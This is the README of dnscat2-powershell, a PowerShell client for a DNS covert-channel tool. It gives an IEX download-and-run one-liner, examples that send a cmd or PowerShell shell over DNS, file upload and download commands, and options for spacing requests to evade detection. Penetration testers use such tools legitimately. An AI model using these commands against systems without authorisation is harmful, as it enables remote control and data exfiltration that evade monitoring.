├── README.md
└── dnscat2.ps1


/README.md:
--------------------------------------------------------------------------------
 1 | [dnscat2](https://github.com/iagox86/dnscat2) is a DNS covert channel tool by [@iagox86 (Ron Bowes)](https://blog.skullsecurity.org/) which is used to transfer data over DNS requests.
 2 | 
 3 | This is a powershell version of the dnscat2 C client.
 4 | 
 5 | [Click here for a blog post](http://www.blackhillsinfosec.com/?p=5578) that gives a more detailed breakdown of the purpose of this script, and how to use it.
 6 | 
 7 | To use this script, you'll need the ruby [dnscat2 server](https://github.com/iagox86/dnscat2). **Make sure to add the `--no-cache` option when running the server. This client is incompatible with the server's caching.**
 8 | 
 9 | ### Setup
10 | 
11 | [First, install the dnscat2 server.](https://github.com/iagox86/dnscat2/blob/master/README.md) Start the server with caching disabled using `--no-cache`. The command to start your server should look something like this: `ruby dnscat2.rb --dns="domain=example.com" --no-cache`
12 | 
13 | Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:
14 | 
15 |     IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')
16 | 
17 | ### Examples
18 | 
19 | Start-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using `-Domain`.
20 | 
21 |     Start a command session, and send DNS requests to 8.8.8.8 on port 53:
22 |         Start-Dnscat2 -Domain <dnscat2 server> -DNSServer 8.8.8.8
23 | 
24 |     Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:
25 |         Start-Dnscat2 -Domain <dnscat2 server> -Exec cmd
26 | 
27 |     Start a console session. Only use CNAME, MX, and AAAA requests:
28 |         Start-Dnscat2 -Domain <dnscat2 server> -LookupTypes @("CNAME","MX","AAAA") -Console
29 | 
30 |     Do not encrypt the session. Encryption is enabled by default.
31 |         Start-Dnscat2 -Domain <dnscat2 server> -NoEncryption
32 | 
33 | ### Powershell Command Session Commands
34 | 
35 | The client can handle normal dnscat2 commands, or the *powershell version* of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):
36 | 
37 |     Start a new session which simulates a Powershell shell, like ExecPS:
38 |         exec psh
39 | 
40 |     Upload app.exe on the server into a hex string stored in the $app powershell variable:
41 |         upload app.exe hex:$app
42 |     
43 |     Download the byte array stored in the $app powershell variable to app.exe on the server:
44 |         download bytes:$app app.exe
45 | 
46 | ### Start-Dnscat2
47 | 
48 |     -Domain <String>          The Domain being used by the dnscat2 server.
49 |     -DNSServer <String>       The hostname or IP Address to send DNS queries to. (Default: Set by Windows)
50 |     -DNSPort <Int32>          The port to send DNS queries to. (Default: 53)
51 |     
52 |     -Command                  Start a command session. (Default)
53 |     -Exec <String>            Link the I/O of a process with the Dnscat2 session.
54 |     -Console                  Link the I/O of the console with the Dnscat2 session.
55 |     -ExecPS                   Simulate a Powershell session and link the IO with the Dnscat2 session.
56 |                               WARNING: Exiting will kill the entire dnscat2 client, not just the session.
57 |     
58 |     -PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.
59 |     -NoEncryption             Do not use encryption.
60 |     
61 |     -LookupTypes <String[]>   Set an array of lookup types to randomly switch between.
62 |                               Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)
63 |     -Delay <Int32>            Set a delay between each request, in milliseconds. (Default: 0)
64 |     -MaxRandomDelay <Int32>   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)
65 |     -MaxPacketSize <Int32>    Maximum length of a dnscat2 packet. (Default: 240)
66 |     -Name <String>            The name of your dnscat2 session. (Default: hostname)
67 | 
68 | ### ExecPS and 'exec psh'
69 | 
70 | dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. **Watch out** for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.
71 | 
72 | ### Other Credits
73 | 
74 | * [db9 on stackoverflow's](https://stackoverflow.com/users/6866918/db9) [demonstration of BouncyCastle ECDH.](http://stackoverflow.com/a/39662164)
75 | * [FrankSpierings's](https://github.com/FrankSpierings) implementation of [Salsa20](https://gist.github.com/FrankSpierings/c18da658e06948313fff) and [Sha3](https://gist.github.com/FrankSpierings/3577b0365d02df6f7eeb) in Powershell via C#.
76 | * [Rebex Labs stripped down version of the BouncyCastle DLL for ECC.](http://labs.rebex.net/curves)
77 | 


--------------------------------------------------------------------------------